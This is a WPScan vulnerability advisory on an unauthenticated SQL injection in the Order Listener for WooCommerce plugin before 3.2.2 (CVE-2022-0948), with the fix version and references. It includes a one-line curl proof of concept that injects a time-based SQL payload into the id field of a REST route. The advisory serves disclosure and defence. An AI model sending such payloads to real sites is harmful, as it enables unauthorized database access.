WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection

Proof of Concept

curl 'http://example.com/?rest_route=/olistener/new' --data '{"id":" (SELECT SLEEP(3))#"}' -H 'content-type: application/json'

Affects Plugins

woc-order-alert
Fixed in version 3.2.2

References

CVE
CVE-2022-0948
URL
https://plugins.trac.wordpress.org/changeset/2707223

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
daad48df-6a25-493f-9d1d-17b897462576

Timeline

Publicly Published

2022-04-12 (about 1 years ago)

Added

2022-04-12 (about 1 years ago)

Last Updated

2022-04-13 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin